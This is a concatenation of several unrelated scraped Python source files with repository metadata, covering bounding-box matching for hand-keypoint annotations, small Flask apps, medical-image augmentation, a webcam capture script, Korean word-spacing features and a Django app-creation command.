    """
    # Corners of the intersection rectangle.
    left = max(boxA[0], boxB[0])
    top = max(boxA[1], boxB[1])
    right = min(boxA[2], boxB[2])
    bottom = min(boxA[3], boxB[3])

    inter_w = right - left + 1
    inter_h = bottom - top + 1
    if inter_w <= 0 or inter_h <= 0:
        # Disjoint boxes are rejected explicitly rather than scored 0.
        return -1.0

    inter_area = inter_w * inter_h
    area_a = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
    area_b = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
    return inter_area / float(area_a + area_b - inter_area)
def match_bboxes(bbox_gt, bbox_pred, IOU_THRESH=0.05):
    '''
    Given sets of true and predicted bounding-boxes, determine the best
    possible 1:1 assignment via Hungarian matching on pairwise IoU.

    Parameters
    ----------
    bbox_gt, bbox_pred : N1x4 and N2x4 np array of bboxes [x1,y1,x2,y2].
        The number of bboxes, N1 and N2, need not be the same.
    IOU_THRESH : minimum IoU for an assignment to count as a valid match.

    Returns
    -------
    (idxs_true, idxs_pred, ious, labels)
    idxs_true, idxs_pred : indices into gt and pred for accepted matches
    ious : corresponding IoU value of each accepted match
    labels : 0/1 vector over all candidate (non-dummy) assignments

    Cleanup vs. the original: removed the unused MAX_DIST constant and the
    dead `ious` computation whose value was never read.
    '''
    n_true = bbox_gt.shape[0]
    n_pred = bbox_pred.shape[0]
    MIN_IOU = 0.0

    # Pairwise IoU table: rows are ground-truth boxes, columns predictions.
    # NUM_GT x NUM_PRED
    iou_matrix = np.zeros((n_true, n_pred))
    for i in range(n_true):
        for j in range(n_pred):
            iou_matrix[i, j] = bbox_iou(bbox_gt[i, :], bbox_pred[j, :])

    # Pad with dummy rows/columns so the assignment problem is square
    # when the two sets differ in size.
    if n_pred > n_true:
        # there are more predictions than ground-truth - add dummy rows
        diff = n_pred - n_true
        iou_matrix = np.concatenate(
            (iou_matrix, np.full((diff, n_pred), MIN_IOU)), axis=0)
    if n_true > n_pred:
        # more ground-truth than predictions - add dummy columns
        diff = n_true - n_pred
        iou_matrix = np.concatenate(
            (iou_matrix, np.full((n_true, diff), MIN_IOU)), axis=1)

    # Hungarian matching maximizes total IoU (minimizes 1 - IoU).
    idxs_true, idxs_pred = scipy.optimize.linear_sum_assignment(1 - iou_matrix)

    # Drop assignments that landed on a dummy (padded) prediction column.
    sel_pred = idxs_pred < n_pred
    idx_pred_actual = idxs_pred[sel_pred]
    idx_gt_actual = idxs_true[sel_pred]
    ious_actual = iou_matrix[idx_gt_actual, idx_pred_actual]

    # Keep only pairs whose overlap clears the threshold.  Dummy gt rows
    # carry MIN_IOU and therefore never survive this filter.
    sel_valid = (ious_actual > IOU_THRESH)
    label = sel_valid.astype(int)
    return idx_gt_actual[sel_valid], idx_pred_actual[sel_valid], ious_actual[sel_valid], label
def cull_annotations():
    """Merge validated ground-truth keypoints with bootstrap detections:
    for each GT frame, keep bootstrap annotations from the +/-5
    neighbouring frames whose boxes match a GT box, zero out keypoints
    the GT marks unlabeled, and write the combined COCO-style JSON."""
    gt = json.load(open("train_validated_keypoints_only.json", "r"))
    boot = json.load(open("hand_keypoints_train_bootstrap.json", "r"))
    # for each image in GT, find entries in boot
    gt_images = gt["images"]
    gt_anns = {}
    boot_anns = {}
    boot_imgs = {}
    max_img_id = 0
    max_ann_id = 0
    # Re-number GT images/annotations with fresh sequential ids.
    for img in gt_images:
        img_id = img["id"]
        # if img_id > max_img_id:
        #     max_img_id = img_id
        img["id"] = max_img_id + 1
        gt_anns[img["file_name"]] = []
        for ann in gt["annotations"]:
            # if ann["id"] > max_ann_id:
            #     max_ann_id = ann["id"]
            if ann["image_id"] == img_id:
                ann["image_id"] = img["id"]
                ann["id"] = max_ann_id
                gt_anns[img["file_name"]].append(ann)
                max_ann_id += 1
        max_img_id += 1
    # Index bootstrap images and annotations by file name.
    for img in boot["images"]:
        img_id = img["id"]
        boot_imgs[img["file_name"]] = img
        boot_anns[img["file_name"]] = []
        for ann in boot["annotations"]:
            if ann["image_id"] == img_id:
                boot_anns[img["file_name"]].append(ann)
    boot_new_images = []
    count = 0
    total = 0
    imgs_to_remove = set()
    for gt_img in gt_images:
        img_name = gt_img["file_name"]
        # File names look like '<vid_id>-<9-digit frame>.jpg'.
        # NOTE(review): non-raw pattern with an unescaped '.' -- works, but fragile.
        vid_id = re.sub("-\d{9}.jpg", "", img_name)
        frame = int(re.search("\d{9}", img_name).group())
        # The ten frames surrounding the validated frame.
        boot_frames = set(["{vid_id}-{frame:09d}.jpg".format(vid_id=vid_id, frame=frame+i) for i in range(-5, 6)])
        boot_frames.remove(img_name)
        # for each entry in boot, match bboxes (x, y, w, h)
        gt_bboxes = []
        for x in gt_anns[img_name]:
            gt_bboxes.append([x["bbox"][0], x["bbox"][1], x["bbox"][0] + x["bbox"][2], x["bbox"][1] + x["bbox"][3]])
        gt_bboxes = np.array(gt_bboxes)
        for f in boot_frames:
            boxes = []
            if f not in boot_anns:
                continue
            # reassign image
            boot_imgs[f]["id"] = max_img_id + 1
            for x in boot_anns[f]:
                boxes.append([x["bbox"][0], x["bbox"][1], x["bbox"][0] + x["bbox"][2], x["bbox"][1] + x["bbox"][3]])
            boxes = np.array(boxes)
            idx_true, idxs_pred, ious, labels = match_bboxes(gt_bboxes, boxes)
            total += 1
            if len(idxs_pred) >= 1:
                count += 1
                # image_debug = cv2.imread("./bootstrap/" + f)
                # find matched boxes + corresponding annotations
                gt_using = [gt_anns[img_name][xi] for xi in idx_true]
                boot_using = [boot_anns[f][xi] for xi in idxs_pred]
                # eliminate keypoints
                remove_idxs = []
                using = []
                for b in range(len(boot_using)):
                    gt_ann = gt_using[b]
                    boot_ann = boot_using[b]
                    boot_ann["image_id"] = max_img_id + 1
                    boot_ann["id"] = max_ann_id + 1
                    keypoints = boot_ann["keypoints"]
                    # Zero out keypoints the validated GT marks as unlabeled
                    # (visibility flag at index i*3+2 equal to 0).
                    for i in range(21):
                        if gt_ann["keypoints"][i * 3 + 2] == 0:
                            keypoints[i * 3] = 0
                            keypoints[i * 3 + 1] = 0
                            keypoints[i * 3 + 2] = 0
                        # else:
                        #     cv2.circle(image_debug, (int(keypoints[i * 3]), int(keypoints[i * 3 + 1])), 4, keypoint_colors[str(i + 1)], -1)
                        #     cv2.putText(image_debug, str(i + 1), (int(keypoints[i * 3] - 4), int(keypoints[i * 3 + 1] - 4)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1, cv2.LINE_AA)
                    if sum(keypoints) == 0:
                        # No keypoints survived -> drop this annotation.
                        remove_idxs.append(b)
                        continue
                    using.append(boot_ann)
                    boot_ann["keypoints"] = keypoints
                    box = boot_ann["bbox"]
                    # cv2.rectangle(image_debug, (int(box[0]), int(box[1])), (int(box[2] + box[0]) , int(box[3] + box[1])), color=(0, 255, 0),thickness=3)
                    # cv2.rectangle(image_debug, (int(box[0]), int(box[1])), (int(box[2]) , int(box[3])), color=(0, 255, 0),thickness=3)
                    # fix error bbox coco error here # Error is in train _bootstrap
                    boot_ann["bbox"] = [box[0], box[1], box[2] - box[0], box[3] - box[1]]  # x y w h
                    boot_ann["area"] = (box[2] - box[0]) * (box[3] - box[1])
                    max_ann_id += 1
                # remove image if no more annotations
                if len(remove_idxs) == len(boot_using):
                    imgs_to_remove.add(f)
                # boot_using = [x for i, x in enumerate(boot_using) if i not in remove_idxs]
                # add to new annotations
                boot_new_images.extend(using)
                # save image for debugging
                # cv2.imwrite("./debug_bootstrap_train_filter/debug_" + f, image_debug)
            else:
                # eliminate image
                imgs_to_remove.add(f)
                print(f)
            max_img_id += 1
    print(len(boot_new_images))
    boot["annotations"] = boot_new_images
    for v in gt_anns.values():
        boot["annotations"].extend(v)
    print(len(boot["annotations"]))
    boot["images"] = list(boot_imgs.values())
    boot["images"].extend(gt["images"])
    print(len(boot["images"]), len(imgs_to_remove), len(gt["images"]))
    removed = set()
    imgs_cpy = list(boot["images"])
    # Drop flagged images (iterate over a copy while mutating the list).
    for img in imgs_cpy:
        if img["file_name"] in imgs_to_remove:
            boot["images"].remove(img)
            removed.add(img["id"])
            if img in gt["images"]:
                print("overlap")
    print(len(boot["images"]), len(boot["annotations"]))
    # remove annotations on removed images
    cpy = list(boot["annotations"])
    for ann in cpy:
        if ann["image_id"] in removed:
            boot["annotations"].remove(ann)
    print("hi")
    # NOTE(review): output name says 'boostrap' (sic) -- kept as-is.
    json.dump(boot, open("train_boostrap_filtered_validated_2.json", "w"))
    print(count, total)
# get rid of unmatched boxes
# get rid of keypoints that aren't labled, occluded, w/in a certain distance
# write to image so you can see what they now look like
cull_annotations()
| egoodman92/semi-supervised-surgery | MULTITASK_FILES/KEYPOINTS_FILES/surgery-hand-detection-new/scripts/filter_bootstrap.py | filter_bootstrap.py | py | 8,359 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.full",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"lin... |
23642938118 | from flask import Flask,render_template,request,redirect,session,flash
app = Flask(__name__)
app.secret_key = 'Farn'
@app.route ('/')
def index():
    # Landing page: render the survey form.
    return render_template('index.html')
@app.route('/result', methods=['POST'])
def result():
    """Validate the submitted survey form and render the result page."""
    # Guard clauses: bounce back to the form with a flash message on bad input.
    if len(request.form['name']) < 1:
        flash("Name cannot be empty!")
        return redirect('/')
    if len(request.form['comment']) < 1:
        flash("Comments cannot be empty!")
        return redirect('/')
    if len(request.form['comment']) >= 120:
        flash("Comments cannot be longer than 120 char.!")
        return redirect('/')
    flash("Success!")
    return render_template('result.html',
                           name=request.form['name'],
                           location=request.form['location'],
                           language=request.form['language'],
                           comment=request.form['comment'])
app.run(debug = True)
| bmcconchie/DojoAssignments | Python/Flask/python_stack/flask_fundamentals/dataform/server.py | server.py | py | 946 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.request.form",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "flask.request... |
17305255074 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 7 17:46:55 2021
@author: Administrator
"""
import SimpleITK as sitk
import numpy as np
import os
import cv2
from shutil import copyfile
import random
# Starting id for the newly generated cases (continues the existing grid).
num=379
# Source cases to duplicate: each yields one verbatim copy and one
# intensity-augmented copy.
lists=['train_002_0000.nii.gz','train_019_0000.nii.gz','train_069_0000.nii.gz','train_101_0000.nii.gz','train_114_0000.nii.gz','train_127_0000.nii.gz','train_150_0000.nii.gz','train_134_0000.nii.gz','train_174_0000.nii.gz','train_195_0000.nii.gz']
for name in lists:
    num=num+1
    # Verbatim copy of image and mask under a fresh sequential id.
    copyfile(os.path.join(r'.\data\Raw\TrainingImg',name),os.path.join(r'.\data\Raw\TrainingImg','train_'+str(num)+'_0000.nii.gz'))
    copyfile(os.path.join(r'.\data\Raw\TrainingMask',name.replace('_0000','')),os.path.join(r'.\data\Raw\TrainingMask','train_'+str(num)+'.nii.gz'))
    num=num+1
    img=sitk.ReadImage(os.path.join(r'.\data\Raw\TrainingImg',name))
    mask=sitk.ReadImage(os.path.join(r'.\data\Raw\TrainingMask',name.replace('_0000','')))
    imgarr=sitk.GetArrayFromImage(img)
    maskarr=sitk.GetArrayFromImage(mask)
    # imgarr1: intensities inside mask label 2 only.
    imgarr1=imgarr.copy()
    imgarr1[maskarr!=2]=0
    # imgarr2: the low-intensity (<=50) part of that region.
    imgarr2=imgarr1.copy()
    imgarr2[imgarr2>50]=0
    # Brighten each low-intensity voxel by a random offset in [100, 150].
    # NOTE(review): this per-voxel Python triple loop is very slow; a
    # vectorized masked np.random.randint would be equivalent -- confirm
    # before changing, since it alters the random draw sequence.
    for i in range(imgarr2.shape[0]):
        for j in range(imgarr2.shape[1]):
            for k in range(imgarr2.shape[2]):
                if imgarr2[i,j,k]!=0:
                    imgarr2[i,j,k]=imgarr2[i,j,k]+random.randint(100,150)
    # Recombine: keep the >50 part, add the brightened <=50 part ...
    imgarr1[imgarr1<=50]=0
    imgarr1=imgarr1+imgarr2
    # ... and splice the augmented region back into the original volume.
    imgarr[maskarr==2]=0
    imgarr=imgarr+imgarr1
    saveimg=sitk.GetImageFromArray(imgarr)
    # Preserve the original geometry metadata on the augmented image.
    saveimg.SetSpacing(img.GetSpacing())
    saveimg.SetDirection(img.GetDirection())
    saveimg.SetOrigin(img.GetOrigin())
    sitk.WriteImage(saveimg,os.path.join(r'.\data\Raw\TrainingImg','train_'+str(num)+'_0000.nii.gz'))
    sitk.WriteImage(mask,os.path.join(r'.\data\Raw\TrainingMask','train_'+str(num)+'.nii.gz'))
{
"api_name": "shutil.copyfile",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "shutil.copyfile",
"line... |
31734592611 | from modules import aws_sript, firestorage_code
import os
from flask import Flask, jsonify
from flask import render_template, request, redirect, url_for
from werkzeug.utils import secure_filename
import os, shutil
from flask_cors import CORS
from decorater_file import crossdomain
global app
app = Flask(__name__)
CORS(app)
app.config['SECRET_KEY'] = 'the quick brown fox jumps over the lazy dog'
app.config['CORS_HEADERS'] = ['Content-Type']
cors = CORS(app, resources={r"/*": {"origins": "*"}})
# Create a directory in a known location to uploaded files to.
uploads_dir = os.path.join(app.instance_path, 'uploads')
if not os.path.exists(uploads_dir):
os.makedirs(uploads_dir)
# Create a directory in a known location to processed files to.
ml_output_dir = os.path.join(app.instance_path, 'ml_output')
if not os.path.exists(ml_output_dir):
os.makedirs(ml_output_dir)
@app.route('/upload', methods=['GET', 'POST'])
def upload():
    """Accept an uploaded image, run the AWS face-detection conversion on
    it, push the result to Firebase storage, and return its URL as JSON.

    NOTE(review): a GET request falls through and returns None (a Flask
    500) -- confirm whether GET should be supported at all.
    """
    if request.method == 'POST':
        # save the single "profile" file
        image = request.files['image']
        print(image)
        # secure_filename strips path components from the client name.
        img_path = os.path.join(uploads_dir, secure_filename(image.filename))
        ml_out_img_path = os.path.join(ml_output_dir, secure_filename(image.filename))
        image.save(img_path)
        print("img_path",img_path)
        print("ml_out_img_path",ml_out_img_path)
        # ML model start
        print("Processing...")
        aws_sript.convert_image(img_path, ml_out_img_path)
        # ML model ends
        print("Image converted successfully")
        img_url = firestorage_code.upload_img(ml_out_img_path)
        print("Image uploaded to firebase storage successfully")
        print("Firebase Image URL ",img_url)
        # cleaning folders
        clean_folders()
        # save each "charts" file
        # for file in request.files.getlist('upload'):
        #     print(file.name)
        #     file.save(os.path.join(uploads_dir, file.name))
        # return redirect(url_for('upload'))
        data = {
            "img_url":img_url
        }
        return jsonify(data),{'Access-Control-Allow-Origin': '*'}
def clean_folders():
    """Empty the upload and ML-output working directories in place."""
    for folder in (uploads_dir, ml_output_dir):
        for entry in os.listdir(folder):
            entry_path = os.path.join(folder, entry)
            try:
                # Files and symlinks are unlinked; directories are
                # removed recursively.
                if os.path.isfile(entry_path) or os.path.islink(entry_path):
                    os.unlink(entry_path)
                elif os.path.isdir(entry_path):
                    shutil.rmtree(entry_path)
            except Exception as e:
                print('Failed to delete %s. Reason: %s' % (entry_path, e))
if __name__ == '__main__':
app.run(debug=True) | akhlaq1/flask-aws-face-detect-api | app.py | app.py | py | 2,784 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_... |
20019809326 | #file used to take screenshot to baseline rectangle mappings off of
import cv2
# Grab one frame from the default webcam (device 0).
cam = cv2.VideoCapture(0)
result, image = cam.read()
if result:
    # Show the frame, save it, and close the window on any key press.
    cv2.imshow("img_to_map", image)
    cv2.imwrite("img_to_map.png", image)
    cv2.waitKey(0)
    cv2.destroyWindow("img_to_map")
else:
    print("No image detected. Please! try again")
{
"api_name": "cv2.VideoCapture",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.imwrite",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number... |
7615563038 | # -*- coding: utf-8 --
import re
import math
from multiprocessing import cpu_count, freeze_support
from multiprocessing.pool import Pool
import sys
from util import read_text_lines
from util import refine_line
from char2vec import load_model
B = 1
I = 0
'''
1. word2vec 모델 불러오기(from char2vec)
'''
def is_hangul(ch):
    """True if *ch* (a character or code point) is a precomposed Hangul syllable."""
    cp = int(ch) if not isinstance(ch, str) else ord(ch)
    return 0xac00 <= cp <= 0xd7a3
def is_ascii(ch):
    """True if *ch* (a character or code point) is printable ASCII (0x20-0x7e)."""
    cp = int(ch) if not isinstance(ch, str) else ord(ch)
    return 0x20 <= cp <= 0x7e
def ch2num(ch):
    """Map a character (or code point) to a small integer id.

    Printable ASCII keeps its code point; Hangul syllables are shifted so
    '가' maps to 256; any other character yields None.
    """
    cp = ord(ch) if isinstance(ch, str) else ch
    if is_hangul(ch):
        return cp - ord('가') + 256
    if is_ascii(ch):
        return cp
    return None
def get_features(line_ch, i):
    """Build the 6-element integer feature vector for position *i* of *line_ch*.

    Slots 0-4 hold the character ids (ch2num) of the window
    [i-2, i-1, i, i+1, i+2]; out-of-range positions stay 0.
    Slot 5 is 1 exactly when i is the first position of the line.

    Bug fix: the original left-context guards were `i > 2` and `i > 1`,
    which skipped the first valid position on each side (i == 2 for the
    i-2 slot, i == 1 for the i-1 slot) even though the symmetric
    right-hand checks include all valid positions.
    """
    X = [0 for _ in range(6)]
    if i >= 2:
        X[0] = ch2num(line_ch[i - 2])
    if i >= 1:
        X[1] = ch2num(line_ch[i - 1])
    X[2] = ch2num(line_ch[i])
    if i < len(line_ch) - 1:
        X[3] = ch2num(line_ch[i + 1])
    if i < len(line_ch) - 2:
        X[4] = ch2num(line_ch[i + 2])
    # Mark the start-of-sentence position.
    if i == 0:
        X[5] = 1
    else:
        X[5] = 0
    return X
def raw2corpus(raw_sentence):
    """Convert a raw sentence into space-separated 'char/TAG' tokens.

    Each non-space character is tagged B (begins a word: first character
    or preceded by a space) or I (inside a word); spaces are dropped.
    """
    # Collapse runs of spaces and trim the ends before tagging.
    text = re.sub(r'(\ )+', ' ', raw_sentence).strip()
    tagged = []
    for idx, ch in enumerate(text):
        if idx == 0:
            tagged.append('{}/B'.format(ch))
        elif ch != ' ':
            tag = 'B' if text[idx - 1] == ' ' else 'I'
            tagged.append('{}/{}'.format(ch, tag))
    return ' '.join(tagged)
def corpus2sent(line):
    """Parse a 'char/TAG char/TAG ...' corpus line into (char, tag) pairs.

    Tokens without a '/' separator are silently skipped.
    """
    pairs = []
    for token in line.split(' '):
        if '/' in token:
            word, tag = token.split('/')
            pairs.append((word, tag))
    return pairs
# "This one is not used" per the original Korean note (이건 사용 안함) --
# though index2feature below still reads char2vec_model; confirm before removing.
char2vec_model = load_model(r'./char2vec_Etri_d30.txt')
# One character-n-gram embedding model per n in {1, 2, 3}.
ngram2vec_models = []
for n in range(1, 4):
    # Alternative pre-trained models, kept for reference:
    #ngram2vec_models.append(load_model(r'./char2vec_Etri_d30_{}gram.txt'.format(n)))
    #ngram2vec_models.append(load_model(r'./char2vec_ted_d40_{}gram.txt'.format(n)))
    ngram2vec_models.append(load_model(r'./char2vec_MDM001_d40_{}gram.txt'.format(n)))
def char2vec(ch):
    """Look up the embedding of a 1-3 character n-gram in the matching model."""
    model = ngram2vec_models[len(ch) - 1]
    return [float(component) for component in model[ch]]
# Harmonic mean
def hmean(values):
    """Return the harmonic mean of *values*: n / sum(1/v).

    Only meaningful for all-positive values (as the original Korean note
    on this family of helpers pointed out).

    Bug fix: the original computed n * prod(values) / sum(values), which
    equals the harmonic mean only for exactly two values.
    """
    return len(values) / sum(1.0 / v for v in values)
# Arithmetic mean
def amean(values):
    """Return the arithmetic mean of *values*.

    Bug fix: the original accumulated the sum into `s` but then returned
    `v / len(values)` -- the *last* element divided by the count.
    """
    s = 0.0
    for v in values:
        s += v
    return s / len(values)
# Geometric mean
def gmean(values):
    """Return the geometric mean (n-th root of the product) of *values*."""
    product = 1
    for v in values:
        product *= v
    return product ** (1.0 / float(len(values)))
def index2feature(line, i, offsets):
    '''
    Fetch the embedding vector of the character at each offset in *offsets*
    (relative to position *i*) and combine multiple lookups into one vector
    by element-wise arithmetic mean.

    Translated from the original Korean notes: when several offsets are
    combined, use a mean rather than a median (distinct combinations could
    collide under a median); experiment 1 used the arithmetic mean,
    experiment 2 the harmonic mean (only meaningful for all-positive
    values), experiment 3 the geometric mean (suited to multiplicative
    quantities, e.g. average interest rates).
    '''
    vec = []
    for off in offsets:
        if i + off < 0 or i + off >= len(line):
            # Out-of-range window: return a zero vector.
            # NOTE(review): the hard-coded length 50 may not match the
            # loaded model dimensionality (d30/d40 files) -- confirm.
            return [0.0 for i in range(50)]
        ch, _ = line[i + off]
        vec.append(char2vec_model[ch])
    result = []
    # Element-wise arithmetic mean across the collected vectors.
    # NOTE(review): the loop variable `i` below shadows the parameter.
    for i in range(len(vec[0])):
        v = []
        for j in range(len(vec)):
            v.append(float(vec[j][i]))
        result.append(amean(v))
    return result
# Features following other papers' design, where the embedding for a span
# of two or more characters is the average of the per-character embeddings.
# (Translated from the original Korean comment.)
def generate_feature(args):
    """args = (line, i): concatenate averaged embeddings of nine character
    windows around position i into a single feature vector."""
    line = args[0]
    i = args[1]
    feature = []
    feature += index2feature(line, i, [-1])
    feature += index2feature(line, i, [0])
    feature += index2feature(line, i, [1])
    feature += index2feature(line, i, [-2, -1])
    feature += index2feature(line, i, [-1, 0])
    feature += index2feature(line, i, [0, 1])
    feature += index2feature(line, i, [-2, -1, 0])
    feature += index2feature(line, i, [-1, 0, 1])
    feature += index2feature(line, i, [0, 1, 2])
    return feature
# Feature using the single-character embeddings from two characters before
# to two characters after the current one.  (Translated from Korean.)
def generate_feature2(args):
    """args = (line, i): concatenate the 30-dim embeddings of the five
    characters in the window [i-2, i+2], zero-padding out-of-range slots."""
    line = args[0]
    i = args[1]
    feature = []
    if i >= 2:
        ch, _ = line[i - 2]
        feature += char2vec(ch)
    else:
        feature += [0.0 for i in range(30)]
    if i >= 1:
        ch, _ = line[i - 1]
        feature += char2vec(ch)
    else:
        feature += [0.0 for i in range(30)]
    ch, _ = line[i]
    feature += char2vec(ch)
    if i < len(line) - 1:
        ch, _ = line[i + 1]
        feature += char2vec(ch)
    else:
        feature += [0.0 for i in range(30)]
    if i < len(line) - 2:
        ch, _ = line[i + 2]
        feature += char2vec(ch)
    else:
        feature += [0.0 for i in range(30)]
    return feature
# Like the paper-based features, but using true multi-character n-gram
# embeddings instead of averaged per-character ones.  (Translated from Korean.)
def generate_feature3(args):
    """args = (tagged_line, i): concatenate 40-dim 1/2/3-gram embeddings
    around position i, zero-padding windows that fall off either end."""
    line = ''.join([l[0] for l in args[0]])
    i = args[1]
    dim = 40
    feature = []
    # 1-gram
    feature += char2vec(line[i-1]) if i >= 1 else [0.0 for a in range(dim)]
    feature += char2vec(line[i])
    feature += char2vec(line[i+1]) if i < len(line)-1 else [0.0 for a in range(dim)]
    # 2-gram
    feature += char2vec(line[i-2:i]) if i >= 2 else [0.0 for a in range(dim)]
    feature += char2vec(line[i-1:i+1]) if i >= 1 else [0.0 for a in range(dim)]
    feature += char2vec(line[i:i+2]) if i < len(line)-1 else [0.0 for a in range(dim)]
    # 3-gram
    feature += char2vec(line[i-2:i+1]) if i >= 2 else [0.0 for a in range(dim)]
    feature += char2vec(line[i-1:i+2]) if i >= 1 and i < len(line)-1 else [0.0 for a in range(dim)]
    feature += char2vec(line[i:i+3]) if i < len(line)-2 else [0.0 for a in range(dim)]
    return feature
def generate_feature4(args):
    """args = (tagged_line, i): like generate_feature3, but with one extra
    trailing 2-gram and 3-gram window (eleven 40-dim segments in total)."""
    line = ''.join([l[0] for l in args[0]])
    i = args[1]
    dim = 40
    feature = []
    # 1-gram
    feature += char2vec(line[i])
    feature += char2vec(line[i-1]) if i >= 1 else [0.0 for a in range(dim)]
    feature += char2vec(line[i+1]) if i < len(line)-1 else [0.0 for a in range(dim)]
    # 2-gram
    feature += char2vec(line[i-2:i]) if i >= 2 else [0.0 for a in range(dim)]
    feature += char2vec(line[i-1:i+1]) if i >= 1 else [0.0 for a in range(dim)]
    feature += char2vec(line[i:i+2]) if i < len(line)-1 else [0.0 for a in range(dim)]
    feature += char2vec(line[i+1:i+3]) if i < len(line)-2 else [0.0 for a in range(dim)]
    # 3-gram
    feature += char2vec(line[i-2:i+1]) if i >= 2 else [0.0 for a in range(dim)]
    feature += char2vec(line[i-1:i+2]) if i >= 1 and i < len(line)-1 else [0.0 for a in range(dim)]
    feature += char2vec(line[i:i+3]) if i < len(line)-2 else [0.0 for a in range(dim)]
    feature += char2vec(line[i+1:i+4]) if i < len(line)-3 else [0.0 for a in range(dim)]
    return feature
def make_data(pool, fname):
    """Build (X, Y): per-character n-gram embedding features and B/I labels
    (1 = begins a word, 0 = inside) for every line of the text file *fname*."""
    lines = read_text_lines(fname)
    lines = (refine_line(line) for line in lines)
    corpus = (raw2corpus(line) for line in lines)
    sent = (corpus2sent(line) for line in corpus)
    X = []
    Y = []
    for line in sent:
        # Feature extraction for each position is fanned out to the pool.
        X += pool.map(generate_feature4, [(line, i) for i in range(len(line))])
        Y += [(1 if y == 'B' else 0) for _, y in line]
    return X, Y
def make_data_divided(pool, fname):
    """Like make_data, but yields (X, Y) chunks every 100000 lines and
    additionally quantizes features with norm_many.

    NOTE(review): make_data does not apply norm_many -- confirm which
    variant downstream training expects.
    """
    lines = read_text_lines(fname)
    lines = (refine_line(line) for line in lines)
    corpus = (raw2corpus(line) for line in lines)
    sent = (corpus2sent(line) for line in corpus)
    line_cnt = 0
    X = []
    Y = []
    for line in sent:
        line_cnt += 1
        x = pool.map(generate_feature4, [(line, i) for i in range(len(line))])
        X += norm_many(pool, x)
        Y += ((1 if y == 'B' else 0) for _, y in line)
        if line_cnt == 100000:
            # Emit a chunk and reset the accumulators.
            yield X, Y
            line_cnt = 0
            X = []
            Y = []
    # Final (possibly partial) chunk.
    yield X, Y
# TODO: revisit once summed multi-character word vectors are taken into
# account.  (Translated from the original Korean comment.)
def norm(arr):
    """Quantize a feature vector: scale each component by 1000, round to a
    whole number, and shift by +10000 so every value is non-negative."""
    return [round(component * 1000, 0) + 10000 for component in arr]
def norm_many(pool, X):
    """Quantize every feature vector in X via the worker pool."""
    normalized = pool.map(norm, X)
    return list(normalized)
def main():
    """Report each n-gram model's component value range, then build the
    training matrix from the TED corpus and print a small sample."""
    for i in range(1, 4):
        char2vec_model = load_model(r'./char2vec_ted_d40_{}gram.txt'.format(i))
        min_v = 0.0
        max_v = 0.0
        # Scan every embedding component for the global min/max.
        for k in char2vec_model.wv.vocab.keys():
            vec = char2vec_model.wv[k]
            for v in vec:
                if v < min_v:
                    min_v = v
                elif v > max_v:
                    max_v = v
        print('#{}: min={}, max={}'.format(i, min_v, max_v))
    #sys.exit(1)
    pool = Pool(processes=cpu_count())
    X, Y = make_data(pool, r'./ted_7_ErasePunc_FullKorean__train.txt')
    print(X[:5])
    print(Y[:5])
if __name__ == '__main__':
freeze_support()
main()
| kimwansu/autospacing_tf | make_data.py | make_data.py | py | 9,337 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.sub",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "char2vec.load_model",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "char2vec.load_model",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "util.read_text_lines"... |
74144288102 | from django.core.management.base import BaseCommand
import os
from importlib import import_module
from django.conf import settings
from django.core.management import call_command
from newapp.utils import get_app_template_path, get_app_templates
APP_TEMPLATES = [ x.get('name') for x in get_app_templates() ]
class Command(BaseCommand):
    """
    Create a new Django app from a bundled app template.

    Example usage:
    python manage.py newapp mambu --template=lite --appsdir=apps
    """
    help = __doc__
    args = '<function arg arg ...>'

    def check_name_conflick(self, name):
        """Return True when *name* collides with an existing project app,
        a bundled Django app name, or any importable module."""
        apps_list = next(os.walk(os.path.join(settings.BASE_DIR, "apps")))[1]
        # Bug fix: the original list was missing a comma after
        # 'staticfiles', silently concatenating it with 'syndication' so
        # neither name was actually reserved.
        apps_list = apps_list + ['admin', 'admindocs', 'auth', 'contenttypes',
                                 'flatpages', 'gis', 'humanize', 'messages',
                                 'postgres', 'redirects', 'sessions',
                                 'sitemaps', 'sites', 'staticfiles',
                                 'syndication']
        if name in apps_list:
            return True
        try:
            import_module(name)
        except ImportError:
            return False
        return True

    def add_arguments(self, parser):
        """Register the positional app name and the template/dir options."""
        parser.add_argument('name', type=str)
        parser.add_argument('--apptype', '-t', dest='apptype', default='lite',
                            help='Application type')
        parser.add_argument('--appdir', '-d', type=str, dest='appdir', default='/',
                            help='Target directory')

    def handle(self, *args, **options):
        """Validate the requested name/template, create the target
        directory, and render the app template into it."""
        name = options['name']
        # Refuse names that would shadow an existing app or module.
        if self.check_name_conflick(name):
            self.stdout.write(self.style.ERROR("Sorry, but you can't use %s as name because this name already taken" % name))
            exit()
        apps_type = options['apptype']
        if apps_type not in APP_TEMPLATES:
            self.stdout.write(self.style.ERROR("no template with name %s" % apps_type))
            exit()
        # Resolve the destination directory for the new app.
        if options['appdir'] == "/":
            app_dir = settings.BASE_DIR
